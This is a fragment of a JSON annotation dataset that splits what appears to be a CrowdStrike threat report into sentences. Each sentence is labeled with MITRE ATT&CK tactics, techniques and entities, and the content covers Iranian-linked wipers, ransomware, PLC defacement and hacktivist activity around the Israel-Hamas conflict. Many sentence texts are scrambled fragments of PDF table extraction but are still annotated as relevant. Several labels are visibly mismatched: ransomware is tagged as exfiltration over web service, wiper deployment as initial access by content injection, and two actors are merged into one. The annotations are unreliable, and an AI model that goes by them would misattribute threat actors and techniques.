of the Israel-Hamas conflict.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p28-s239-503007", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 28, "sentence_id": 239, "context_before": "This activity is likely an attempt to inflict physical and psychological damage on Israeli citizens and will likely continue throughout the duration of the Israel-Hamas conflict.", "sentence_text": "This assessment is made with high confidence based on consistent targeting to date and similar activity observed in other recent conflicts, such as the Russia-Ukraine war.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p28-s240-2b455b", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 28, "sentence_id": 240, "context_before": "This assessment is made with high confidence based on consistent targeting to date and similar activity observed in other recent conflicts, such as the Russia-Ukraine war.", "sentence_text": "Operations Beyond the Immediate Conflict Region Limited hacktivist activity extended beyond the immediate conflict area in retaliation against real or perceived support of Israel.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p28-s241-450203", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 28, "sentence_id": 241, "context_before": "Operations Beyond the Immediate Conflict Region Limited hacktivist activity extended beyond the immediate conflict area in retaliation against real or perceived support of Israel.", "sentence_text": "This activity was accompanied by references to U.K. support for Israel.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p28-s242-e8f517", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 28, "sentence_id": 242, "context_before": "This activity was accompanied by references to U.K. support for Israel.", "sentence_text": "The alleged leak was reportedly in retaliation against U.S. support for Israel as well as to show support for Palestinians.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p28-s243-5085d1", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 28, "sentence_id": 243, "context_before": "The alleged leak was reportedly in retaliation against U.S. support for Israel as well as to show support for Palestinians.", "sentence_text": "Hacktivists will likely continue limited targeting of countries and entities beyond the conflict region that they perceive as supporting Israel.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p29-s244-d9c96b", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 29, "sentence_id": 244, "context_before": "Hacktivists will likely continue limited targeting of countries and entities beyond the conflict region that they perceive as supporting Israel.", "sentence_text": "Iranian Adversaries Operate Inauthentic Personas for Disruption and IO to Hamas’ cyber units or IDQB’s kinetic operations.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Masquerading to disrupt operations", "entities": [ { "text": "Iranian Adversaries", "start": 0, "end": 19, "label": "ThreatActor" }, { "text": "Operate Inauthentic Personas", "start": 20, "end": 48, "label": "Action" }, { "text": "Disruption and IO", "start": 53, "end": 70, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p29-s245-52bfcc", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 29, "sentence_id": 245, "context_before": "Iranian Adversaries Operate Inauthentic Personas for Disruption and IO to Hamas’ cyber units or IDQB’s kinetic operations.", "sentence_text": "Iranian adversaries associated with the country’s Ministry of Intelligence and Security (MOIS) and Islamic Revolutionary Guard Corps (IRGC) have an established record of using disruptive and destructive attacks, hack-and-leak operations, inauthentic personas and hacktivist groups to target Israeli entities.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0010", "name": "Exfiltration" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Disruptive and destructive attacks, leaks and masquerading to Israeli entities", "entities": [ { "text": "Iranian adversaries associated with the country’s Ministry of Intelligence and Security (MOIS) and Islamic Revolutionary Guard Corps (IRGC)", "start": 0, "end": 139, "label": "ThreatActor" }, { "text": "disruptive and destructive attacks", "start": 176, "end": 210, "label": "Action" }, { "text": "hack-and-leak operations", "start": 212, "end": 236, "label": "Action" }, { "text": "target ", "start": 284, "end": 291, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p29-s246-28032c", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 29, "sentence_id": 246, "context_before": "Iranian adversaries associated with the country’s Ministry of Intelligence and Security (MOIS) and Islamic Revolutionary Guard Corps (IRGC) have an established record of using disruptive and destructive attacks, hack-and-leak operations, inauthentic personas and hacktivist groups to target Israeli entities.", "sentence_text": "This cyber-enabled activity is likely intended to influence Israeli audiences during the ongoing crisis.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p29-s247-7327ee", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 29, "sentence_id": 247, "context_before": "This cyber-enabled activity is likely intended to influence Israeli audiences during the ongoing crisis.", "sentence_text": "Though Iranian cyber operations have historically focused on Israel, the number of faketivist personas leveraged against Israeli targets has increased since the onset of the Israel-Hamas conflict.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p29-s248-c56bf8", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 29, "sentence_id": 248, "context_before": "Though Iranian cyber operations have historically focused on Israel, the number of faketivist personas leveraged against Israeli targets has increased since the onset of the Israel-Hamas conflict.", "sentence_text": "These personas’ claims focus on campaign impacts on operational technology and are almost certainly intended to influence the target populations’ perception of Iranian adversaries’ ability to disrupt critical services.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p29-s249-e156ef", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 29, "sentence_id": 249, "context_before": "These personas’ claims focus on campaign impacts on operational technology and are almost certainly intended to influence the target populations’ perception of Iranian adversaries’ ability to disrupt critical services.", "sentence_text": "OCT OCTOBER\nMOIS-LINKED BANISHED KITTEN DEPLOYED A NEW WIPER MALWARE FAMILY AGAINST COMPANIES IN ISRAEL.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1659", "name": "Content Injection" } ], "procedure": "Deployed wiper malware against companies", "entities": [ { "text": "BANISHED KITTEN", "start": 24, "end": 39, "label": "ThreatActor" }, { "text": "DEPLOYED ", "start": 40, "end": 49, "label": "Action" }, { "text": "WIPER MALWARE FAMILY", "start": 55, "end": 75, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p29-s250-8561ed", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 29, "sentence_id": 250, "context_before": "OCT OCTOBER\nMOIS-LINKED BANISHED KITTEN DEPLOYED A NEW WIPER MALWARE FAMILY AGAINST COMPANIES IN ISRAEL.", "sentence_text": "BiBiWiper INCLUDES OCTOBER 9 VERSIONSLINUX SYSTEMS.COMPILEDAN FORANTI-ISRAELIBOTH WINDOWSMESSAGINGAND CAMPAIGN BY THE PERSONA Karma Power SPECTRAL KITTEN LEVERAGED THE MalekTeam OCCURED", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1485", "name": "Data Destruction" }, { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "Deploy BiBiWiper (Linux and Windows versions) via persona Karma Power", "entities": [ { "text": "BiBiWiper ", "start": 0, "end": 10, "label": "MalwareTool" }, { "text": "Karma Power SPECTRAL KITTEN", "start": 126, "end": 153, "label": "ThreatActor" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p29-s251-ecd7cd", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 29, "sentence_id": 251, "context_before": "BiBiWiper INCLUDES OCTOBER 9 VERSIONSLINUX SYSTEMS.COMPILEDAN FORANTI-ISRAELIBOTH WINDOWSMESSAGINGAND CAMPAIGN BY THE PERSONA Karma Power SPECTRAL KITTEN LEVERAGED THE MalekTeam OCCURED", "sentence_text": "ALONGSIDE THE REPORTED PERSONA TO LEAK PII, CCTV FOOTAGE AND OTHER WIPER OPERATIONS.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1485", "name": "Data Destruction" } ], "procedure": "Leak personal info, CCTV footage and other wiper operations", "entities": [ { "text": "LEAK", "start": 34, "end": 38, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p29-s252-c44447", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 29, "sentence_id": 252, "context_before": "ALONGSIDE THE REPORTED PERSONA TO LEAK PII, CCTV FOOTAGE AND OTHER WIPER OPERATIONS.", "sentence_text": "DATA ALLEGEDLY SOURCED", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p29-s253-27a385", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 29, "sentence_id": 253, "context_before": "DATA ALLEGEDLY SOURCED", "sentence_text": "FROM INTRUSIONS TARGETING ISRAELI ENTITIES.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p29-s254-7fb62c", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 29, "sentence_id": 254, "context_before": "FROM INTRUSIONS TARGETING ISRAELI ENTITIES.", "sentence_text": "NOVEMBER HAYWIRE KITTEN – ASSOCIATED WITH IRGC CONTRACTOR Emennet Pasargad – OPERATED PERSONAS Yare Gomnam Cyber Team AND SYSTEMS", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p29-s256-6a74f5", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 29, "sentence_id": 256, "context_before": "AT U.S.", "sentence_text": "AIRPORTS, THREATEN CYBER- OCTOBER 26-28 al-Toufan Team TO CLAIM TARGETING OF CCTV VENGEFUL KITTEN PERSONA Moses Staff ENABLED KINETIC ATTACKS AGAINST ISRAEL CLAIMED DATA WIPING ACTIVITY AGAINST AND CARRY OUT HACK-AND-LEAK AND DDOS ICS IN ISRAEL AND INDICATED AN OPERATIONS.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1125", "name": "Video Capture" }, { "id": "T1485", "name": "Data Destruction" }, { "id": "T1498", "name": "Network Denial of Service" } ], "procedure": "Targeting CCTV", "entities": [ { "text": " al-Toufan Team", "start": 39, "end": 54, "label": "ThreatActor" }, { "text": "CCTV ", "start": 77, "end": 82, "label": "Infrastructure_Indicator" }, { "text": "VENGEFUL KITTEN PERSONA Moses Staff", "start": 82, "end": 117, "label": "ThreatActor" }, { "text": "DATA WIPING", "start": 165, "end": 176, "label": "Action" }, { "text": "CARRY OUT HACK-AND-LEAK", "start": 198, "end": 221, "label": "Action" }, { "text": "DDOS ", "start": 226, "end": 231, "label": "Action" }, { "text": "ICS ", "start": 231, "end": 235, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p29-s257-94bcfd", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 29, "sentence_id": 257, "context_before": "AIRPORTS, THREATEN CYBER- OCTOBER 26-28 al-Toufan Team TO CLAIM TARGETING OF CCTV VENGEFUL KITTEN PERSONA Moses Staff ENABLED KINETIC ATTACKS AGAINST ISRAEL CLAIMED DATA WIPING ACTIVITY AGAINST AND CARRY OUT HACK-AND-LEAK AND DDOS ICS IN ISRAEL AND INDICATED AN OPERATIONS.", "sentence_text": "INTEREST IN SHORT MESSAGE SYSTEM (SMS), BASE TRANSCEIVER STATIONS THE SoldiersOfSolomon PERSONA USED AND PUBLIC ALERT SYSTEMS.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p29-s258-aef7fc", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 29, "sentence_id": 258, "context_before": "INTEREST IN SHORT MESSAGE SYSTEM (SMS), BASE TRANSCEIVER STATIONS THE SoldiersOfSolomon PERSONA USED AND PUBLIC ALERT SYSTEMS.", "sentence_text": "DESTRUCTIVE RANSOMWARE VARIANT Crucio AGAINST IOT DEVICES IN ISRAEL.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1567", "name": "Exfiltration Over Web Service" } ], "procedure": "Ransomeware against IOT devices", "entities": [ { "text": "RANSOMWARE VARIANT Crucio", "start": 12, "end": 37, "label": "MalwareTool" }, { "text": "IOT DEVICES", "start": 46, "end": 57, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p29-s259-f9d03d", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 29, "sentence_id": 259, "context_before": "DESTRUCTIVE RANSOMWARE VARIANT Crucio AGAINST IOT DEVICES IN ISRAEL.", "sentence_text": "Cyber Av3ngers COMPROMISED AND DEFACED PROGRAMMABLE LOGIC CONTROLLERS (PLC) IN ISRAEL AND THE U.S. TARGETED ENTITIES INCLUDED CRITICAL INFRASTRUCTURE SECTORS SUCH AS WATER TREATMENT FACILITIES.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1491", "name": "Defacement" }, { "id": "T1584", "name": "Compromise Infrastructure" } ], "procedure": "Compromised and defaced PLC including infrastructure sectors", "entities": [ { "text": "WATER TREATMENT FACILITIES", "start": 166, "end": 192, "label": "Infrastructure_Indicator" }, { "text": "COMPROMISED", "start": 15, "end": 26, "label": "Action" }, { "text": "DEFACED", "start": 31, "end": 38, "label": "Action" }, { "text": "Cyber Av3ngers", "start": 0, "end": 14, "label": "ThreatActor" }, { "text": "PROGRAMMABLE LOGIC CONTROLLERS (PLC)", "start": 39, "end": 75, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p29-s260-606239", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 29, "sentence_id": 260, "context_before": "Cyber Av3ngers COMPROMISED AND DEFACED PROGRAMMABLE LOGIC CONTROLLERS (PLC) IN ISRAEL AND THE U.S. TARGETED ENTITIES INCLUDED CRITICAL INFRASTRUCTURE SECTORS SUCH AS WATER TREATMENT FACILITIES.", "sentence_text": "REPORTING LINKS THESE GROUPS NOV TO THE IRGC.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p30-s261-98c6e4", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 30, "sentence_id": 261, "context_before": "REPORTING LINKS THESE GROUPS NOV TO THE IRGC.", "sentence_text": "Adversary Date in 2023 Activity MALEKTEAM PERSONA LEAKED PII, CCTV SPECTRAL FOOTAGE AND OTHER DATA ALLEGEDLY", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p30-s262-1d8eeb", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 30, "sentence_id": 262, "context_before": "Adversary Date in 2023 Activity MALEKTEAM PERSONA LEAKED PII, CCTV SPECTRAL FOOTAGE AND OTHER DATA ALLEGEDLY", "sentence_text": "OCTOBER 9 KITTEN SOURCED FROM INTRUSIONS TARGETING ISRAELI ENTITIES HAYWIRE KITTEN, ASSOCIATED", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p30-s263-37a7c7", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 30, "sentence_id": 263, "context_before": "OCTOBER 9 KITTEN SOURCED FROM INTRUSIONS TARGETING ISRAELI ENTITIES HAYWIRE KITTEN, ASSOCIATED", "sentence_text": "WITH IRGC CONTRACTOR EMENNET PASARGAD, OPERATED PERSONAS YARE GOMNAM CYBER TEAM AND", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p30-s264-6df4d1", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 30, "sentence_id": 264, "context_before": "WITH IRGC CONTRACTOR EMENNET PASARGAD, OPERATED PERSONAS YARE GOMNAM CYBER TEAM AND", "sentence_text": "HAYWIRE OCTOBER-", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p30-s265-f19eb8", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 30, "sentence_id": 265, "context_before": "HAYWIRE OCTOBER-", "sentence_text": "AL-TOUFAN TEAM TO CLAIM CCTV SYSTEM KITTEN NOVEMBER TARGETING AT U.S.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1125", "name": "Video Capture" } ], "procedure": "Compromise CCTV system", "entities": [ { "text": "AL-TOUFAN TEAM", "start": 0, "end": 14, "label": "ThreatActor" }, { "text": "CCTV SYSTEM", "start": 24, "end": 35, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p30-s266-4f0eb8", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 30, "sentence_id": 266, "context_before": "AL-TOUFAN TEAM TO CLAIM CCTV SYSTEM KITTEN NOVEMBER TARGETING AT U.S.", "sentence_text": "AIRPORTS, THREATEN CYBER-ENABLED KINETIC ATTACKS AGAINST ISRAEL, AND CARRY OUT HACK-AND-LEAK AND DDOS OPERATIONS MOIS-LINKED BANISHED KITTEN DEPLOYED THE BIBIWIPER MALWARE FAMILY AGAINST BANISHED COMPANIES IN ISRAEL; A KARMA POWER OCTOBER KITTEN ANTI-ISRAELI MESSAGING CAMPAIGN OCCURRED ALONGSIDE THE REPORTED WIPER OPERATIONS MOSES STAFF CLAIMED DATA-WIPING ACTIVITY AGAINST MORE THAN 20 VENGEFUL COMPANIES’ INDUSTRIAL CONTROL SYSTEMS OCTOBER 26-28 KITTEN (ICS) IN ISRAEL AND INDICATED INTEREST IN SMS, BASE-TRANSCEIVER STATIONS AND PUBLIC ALERT SYSTEMS IRGC-LINKED SOLDIERSOFSOLOMON USED DESTRUCTIVE RANSOMWARE VARIANT CRUCIO AGAINST INTERNET OF THINGS (IoT)\nDEVICES IN ISRAEL; IRGC-AFFILIATED UNATTRIBUTED OCTOBER-", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0010", "name": "Exfiltration" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1498", "name": "Network Denial of Service" }, { "id": "T1485", "name": "Data Destruction" }, { "id": "T1659", "name": "Content Injection" } ], "procedure": "Carry out hack and leak, DDOS", "entities": [ { "text": "BANISHED KITTEN", "start": 125, "end": 140, "label": "ThreatActor" }, { "text": "DEPLOYED ", "start": 141, "end": 150, "label": "Action" }, { "text": "BIBIWIPER ", "start": 154, "end": 164, "label": "MalwareTool" }, { "text": "AIRPORTS", "start": 0, "end": 8, "label": "Infrastructure_Indicator" }, { "text": "CARRY OUT HACK-AND-LEAK AND DDOS", "start": 69, "end": 101, "label": "Action" }, { "text": "KARMA POWER", "start": 219, "end": 230, "label": "ThreatActor" }, { "text": "INDUSTRIAL CONTROL SYSTEMS", "start": 409, "end": 435, "label": "Infrastructure_Indicator" }, { "text": "SOLDIERSOFSOLOMON", "start": 567, "end": 584, "label": "ThreatActor" }, { "text": "USED ", "start": 585, "end": 590, "label": "Action" }, { "text": "DESTRUCTIVE RANSOMWARE VARIANT CRUCIO", "start": 590, "end": 627, "label": "MalwareTool" }, { "text": "INTERNET OF THINGS (IoT)\nDEVICES", "start": 636, "end": 668, "label": "Infrastructure_Indicator" }, { "text": "MOSES STAFF", "start": 327, "end": 338, "label": "ThreatActor" }, { "text": "DATA-WIPING ACTIVITY", "start": 347, "end": 367, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p30-s267-bca824", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 30, "sentence_id": 267, "context_before": "AIRPORTS, THREATEN CYBER-ENABLED KINETIC ATTACKS AGAINST ISRAEL, AND CARRY OUT HACK-AND-LEAK AND DDOS OPERATIONS MOIS-LINKED BANISHED KITTEN DEPLOYED THE BIBIWIPER MALWARE FAMILY AGAINST BANISHED COMPANIES IN ISRAEL; A KARMA POWER OCTOBER KITTEN ANTI-ISRAELI MESSAGING CAMPAIGN OCCURRED ALONGSIDE THE REPORTED WIPER OPERATIONS MOSES STAFF CLAIMED DATA-WIPING ACTIVITY AGAINST MORE THAN 20 VENGEFUL COMPANIES’ INDUSTRIAL CONTROL SYSTEMS OCTOBER 26-28 KITTEN (ICS) IN ISRAEL AND INDICATED INTEREST IN SMS, BASE-TRANSCEIVER STATIONS AND PUBLIC ALERT SYSTEMS IRGC-LINKED SOLDIERSOFSOLOMON USED DESTRUCTIVE RANSOMWARE VARIANT CRUCIO AGAINST INTERNET OF THINGS (IoT)\nDEVICES IN ISRAEL; IRGC-AFFILIATED UNATTRIBUTED OCTOBER-", "sentence_text": "CYBER AV3NGERS COMPROMISED AND DEFACED IRGC-NEXUS PERSONAS NOVEMBER PROGRAMMABLE LOGIC CONTROLLERS (PLCs)", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1584", "name": "Compromise Infrastructure" }, { "id": "T1491", "name": "Defacement" } ], "procedure": "Compromised and defaced PLCs", "entities": [ { "text": "CYBER AV3NGERS", "start": 0, "end": 14, "label": "ThreatActor" }, { "text": "COMPROMISED ", "start": 15, "end": 27, "label": "Action" }, { "text": "DEFACED ", "start": 31, "end": 39, "label": "Action" }, { "text": "PROGRAMMABLE LOGIC CONTROLLERS (PLCs)", "start": 68, "end": 105, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p30-s268-0e26c7", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 30, "sentence_id": 268, "context_before": "CYBER AV3NGERS COMPROMISED AND DEFACED IRGC-NEXUS PERSONAS NOVEMBER PROGRAMMABLE LOGIC CONTROLLERS (PLCs)", "sentence_text": "IN ISRAEL AND THE U.S.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p30-s269-2701b9", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 30, "sentence_id": 269, "context_before": "IN ISRAEL AND THE U.S.", "sentence_text": "AT CRITICAL INFRASTRUCTURE ENTITIES SUCH AS WATER TREATMENT FACILITIES4 UNKNOWN UNKNOWN IRAN-NEXUS ACTOR DEPLOYED DECEMBER 19 IRAN-NEXUS ACTOR WIPERS AGAINST ISRAELI ORGANIZATIONS", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1485", "name": "Data Destruction" } ], "procedure": "Deployed wipers against organizations", "entities": [ { "text": "WIPERS", "start": 143, "end": 149, "label": "Action" }, { "text": "ORGANIZATIONS", "start": 166, "end": 179, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p30-s272-4335b7", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 30, "sentence_id": 272, "context_before": "GOMNAM", "sentence_text": "CYBER TEAM CLAIMED HAYWIRE KITTEN DECEMBER 25 RESPONSIBILITY FOR POWER OUTAGES", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p30-s273-c1bf4d", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 30, "sentence_id": 273, "context_before": "CYBER TEAM CLAIMED HAYWIRE KITTEN DECEMBER 25 RESPONSIBILITY FOR POWER OUTAGES", "sentence_text": "IN ISRAEL 4 https://www.cisa.gov/news-events/alerts/2023/12/01/cisa-and-partners-release-joint-advisory-irgc-affiliated-cyber-actors-exploiting-plcs", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p31-s274-c035e5", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 31, "sentence_id": 274, "context_before": "IN ISRAEL 4 https://www.cisa.gov/news-events/alerts/2023/12/01/cisa-and-partners-release-joint-advisory-irgc-affiliated-cyber-actors-exploiting-plcs", "sentence_text": "However, identified incidents have largely been misaligned with early concerns that Iranian cyberattacks could cause significant disruptions across critical sectors in Israel and broaden in scope to allied countries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p31-s275-d65761", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 31, "sentence_id": 275, "context_before": "However, identified incidents have largely been misaligned with early concerns that Iranian cyberattacks could cause significant disruptions across critical sectors in Israel and broaden in scope to allied countries.", "sentence_text": "This misalignment may point to Iranian forces’ incapability or lack of preparedness and their desire to avoid an unintended escalation that could draw Iran more directly into the conflict.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p31-s276-7eae8c", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 31, "sentence_id": 276, "context_before": "This misalignment may point to Iranian forces’ incapability or lack of preparedness and their desire to avoid an unintended escalation that could draw Iran more directly into the conflict.", "sentence_text": "Iran’s regional proxies — the Houthi movement in Yemen and Hezbollah in Lebanon, respectively — even though these entities have not yet been observed within the Israel-Hamas conflict context.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p31-s277-f6e083", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 31, "sentence_id": 277, "context_before": "Iran’s regional proxies — the Houthi movement in Yemen and Hezbollah in Lebanon, respectively — even though these entities have not yet been observed within the Israel-Hamas conflict context.", "sentence_text": "Pro-Iraqi Shia militia hacktivist groups have demonstrated consistent involvement in targeting Israeli entities since the onset of the conflict.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p31-s278-2f7dc4", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 31, "sentence_id": 278, "context_before": "Pro-Iraqi Shia militia hacktivist groups have demonstrated consistent involvement in targeting Israeli entities since the onset of the conflict.", "sentence_text": "An escalation in kinetic hostilities could lead to related activity from these groups.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p31-s279-13a46c", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 31, "sentence_id": 279, "context_before": "An escalation in kinetic hostilities could lead to related activity from these groups.", "sentence_text": "Hacktivist activity will almost certainly continue apace with fluctuations in related geopolitical developments.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p31-s280-83601b", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 31, "sentence_id": 280, "context_before": "Hacktivist activity will almost certainly continue apace with fluctuations in related geopolitical developments.", "sentence_text": "This assessment is made with high confidence based on the activity patterns exhibited to date as well as consistent patterns observed across other similar conflicts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p32-s281-3744c8", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 32, "sentence_id": 281, "context_before": "This assessment is made with high confidence based on the activity patterns exhibited to date as well as consistent patterns observed across other similar conflicts.", "sentence_text": "THREATS ON THE 2024 HORIZON As organizations plan for potential threats emerging in 2024, two potential disruption drivers come to the forefront: generative AI and 2024 global government elections.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p32-s282-91768f", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 32, "sentence_id": 282, "context_before": "THREATS ON THE 2024 HORIZON As organizations plan for potential threats emerging in 2024, two potential disruption drivers come to the forefront: generative AI and 2024 global government elections.", "sentence_text": "Generative AI Use Within the Threat Landscape Mainstream accessible generative AI technology exploded in late 2022, opening up a new realm of possibilities for efficient content creation and drawing the attention of adversaries seeking ways to exploit this new technology for their own purposes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p32-s283-45c45f", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 32, "sentence_id": 283, "context_before": "Generative AI Use Within the Threat Landscape Mainstream accessible generative AI technology exploded in late 2022, opening up a new realm of possibilities for efficient content creation and drawing the attention of adversaries seeking ways to exploit this new technology for their own purposes.", "sentence_text": "Generative AI has massively democratized computing to improve adversary operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p32-s284-6bb4b6", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 32, "sentence_id": 284, "context_before": "Generative AI has massively democratized computing to improve adversary operations.", "sentence_text": "It can also potentially lower the entry barrier to the threat landscape for less sophisticated threat actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": 